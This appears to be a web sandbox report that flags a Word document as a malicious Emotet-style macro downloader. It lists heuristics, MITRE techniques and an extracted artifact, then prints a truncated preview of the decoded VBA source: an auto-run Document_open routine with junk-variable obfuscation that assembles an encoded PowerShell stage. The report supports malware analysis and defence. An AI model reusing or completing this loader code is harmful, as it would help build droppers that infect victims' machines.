MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro that is triggered by the Document_Open event. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' and the presence of a 'macros.bas' file further support the malicious nature of this document, likely acting as a downloader for a secondary payload.
Heuristics 6
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42005 bytes |
SHA-256: 41ac244dd57d7f96fdfed2c44c5b4ed8f5f283344c38c88c239d442d74c87f51 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kaioCOP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qvOOMi = CDbl(66379)
jcSDj = Sgn(65077)
oKfUnD = wVJzRU
wVfYD = 89320
oqsGr = CStr(53614)
ZwLWn = JLiiB
Application.Run DwsENM + "WAhTpzszhfMHI" + fkGmf, nYAUmO + NbzqJQcHQCOr + bjYZwd
zMmrBX = CDbl(22616)
awlfud = Sgn(93065)
TJjqA = JrrPFQ
YTGji = 28552
wPlIU = CStr(93582)
DiHURi = FQRnd
End Sub
Attribute VB_Name = "DvzlRvT"
Sub dfvMO(WEXYVD)
FJkvnl = CDbl(21484)
CowEM = Sgn(29254)
PzqYc = aDLIDB
AstRZC = 95326
PqdJIj = CStr(50915)
zHBOTo = hwaEf
End Sub
Function NbzqJQcHQCOr()
On Error Resume Next
zoANLk = CDbl(71014)
InNKKK = Sgn(5961)
qoSAXE = XibYd
IWQnF = 69179
UpXLG = CStr(75405)
dFpwzH = rtbqb
UOfMTUBSUat = JhbaId("nDEANwA0AGMAMQBiADgAMQA4ADQANQBmADQAYQA3AGYANwAyADQAYQBPTK8Y", uRKUOC - uRKUOC + 2 + uRKUOC - uRKUOC, uRKUOC - uRKUOC + 54 + uRKUOC - uRKUOC)
cdijMH = CDbl(42939)
QwWFau = Sgn(48405)
QHukP = RpfbVF
dozdo = 61709
HozwQp = CStr(24988)
SrWMn = cUwqft
dYTLL = CDbl(55207)
HBQDQ = Sgn(56385)
Uhjzzo = UaHVE
HSPCl = 51989
rrMRnf = CStr(69700)
WYZLYj = MBUVH
hnwiiSbqov = JhbaId("XzZgA0ADEANwBkAGYAOABmAGUA'| .('C'+'oNvERTT'+'O'+'-s'+'ecuREs'+'TrInG') -KE 65,40,85,29,16,99,251,204,243,35,129,78,92,129,147,189)) ) )|&( $sHelLId[1]+$SHElLid[13]+'X')3mr7", sElmR - sElmR + 3 + sElmR - sElmR, sElmR - sElmR + 169 + sElmR - sElmR)
JwLpHI = CDbl(89118)
mNRojC = Sgn(55716)
RMSEf = BiKjki
NhPTw = 65614
AbjXpr = CStr(69886)
IWphv = jIDDQL
bplzDb = CDbl(12850)
pTETc = Sgn(10449)
RYRvBP = bzAME
wujFwj = 93793
IIlivZ = CStr(98711)
qITisj = CqkZFN
pkmNhE = JhbaId(",WZBkADEANgBmADkANwAyADgAZAA4AGMAMgA5ADcAMgBjAGUAOQBmAGQANABkAGMANQBiADQAOABmADAAZQA5AGQANwAyADkANgAzADkANgA3ADgAZQA3ADUANgBlADgANgA3AGYAMwA1ADYAOQAwAGQAMAAzADIAOABmADQANGtY", dfbYLj - dfbYLj + 4 + dfbYLj - dfbYLj, dfbYLj - dfbYLj + 167 + dfbYLj - dfbYLj)
zrWLbv = CDbl(69342)
VwIHJQ = Sgn(60214)
FqWzI = saCNHh
NHrRW = 21585
IkzDsr = CStr(74551)
WlaWW = fiiOd
VzSYbX = CDbl(67828)
vjGTUk = Sgn(14912)
wSETu = tSzSR
MrEYqr = 43440
kTPCfR = CStr(83050)
sVbIB = SpWTEL
nXffCRtu = JhbaId("7h( [rUNtiME.INTerOpSerVIces.MArPLrX", wvIOo - wvIOo + 3 + wvIOo - wvIOo, wvIOo - wvIOo + 30 + wvIOo - wvIOo)
AaIGC = CDbl(60649)
bhddN = Sgn(60203)
iCCndS = acqIfV
PCWmK = 43305
sHvdln = CStr(71714)
rwvVQ = nTfbtZ
zjUwfk = CDbl(68475)
WcCRz = Sgn(64923)
LuWQo = WdHBtK
DSSsIZ = 27303
RQZIAa = CStr(85819)
iujJs = IuFhCc
HDlAAKEM = JhbaId("LOSHaL]::([rUNtIme.INtErOpseRvIcES.mARshaL].GeTMeMBers()[2].naME).INvOKE([rUntiME.InTERopSEsEFH", zSwWKi - zSwWKi + 3 + zSwWKi - zSwWKi, zSwWKi - zSwWKi + 89 + zSwWKi - zSwWKi)
Nvmaz = CDbl(36341)
JJJaT = Sgn(44537)
iwHnIi = YHMBtF
YmaWm = 71115
UniDH = CStr(78354)
ZkGpVD = wwuuzf
qpLkQ = CDbl(42353)
fHYNuv = Sgn(40247)
fzTAbO = kqvHa
NatwPK = 78333
DYSfq = CStr(26227)
DPAVP = PXcTc
YNARrTv = JhbaId("KuJfGUA2vSvG", oZZDNu - oZZDNu + 5 + oZZDNu - oZZDNu, oZZDNu - oZZDNu + 3 + oZZDNu - oZZDNu)
nEUpIv = CDbl(95835)
jfPik = Sgn(61914)
caBUk = chaum
NwCQf = 75425
ARjiK = CStr(69123)
vtXAVk = Mnzawr
XjQAGT = CDbl(93779)
OiWTV = Sgn(78570)
SslNh = ORrBjb
CHMJY = 76871
zsWRjw = CStr(55750)
RjkhzK = bOwOo
cDuoh = JhbaId("KqME0ADEAZQA4ADcAMgBiADQAMAA3ADgAZAA2AGMAMwBkADkAZAA3ADEAMwBiADUAZAA1ADAAWBiGq", KWtuVl - KWtuVl + 5 + KWtuVl - KWtuVl, KWtuVl - KWtuVl + 69 + KWtuVl - KWtuVl)
RZzZr = CDbl(63730)
HWMuhC = Sgn(48534)
VUdiO = AKQziF
fzNKzd = 65640
XrsRd = CStr(35333)
UqAulm = uTfZU
fNZYO = CDbl(74182)
PlLFf = Sgn(64840)
BhQkCS = MGUdB
coYRb = 11163
wPifph = CStr(83789)
VEUWaX = tzvhB
KOiYXm = JhbaId("jqAZgBlADQAOAAxADUAZgBiAGIAZQBkAGQANgAwAGYANwBhADQAOABjAGIAMgBhADQAYgAyAGYAZQAwAGIAMgA4AGUANAAyADIANABhADUAYQA5ADgAYwBjADMANAA0ADYAMgBkAGYANwBkAGEAMgBiAGQAOQBjADkAMwBkADkAMQA0AGMAiiq%DR", OiaNb - OiaNb + 3 + OiaNb - OiaNb, O
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.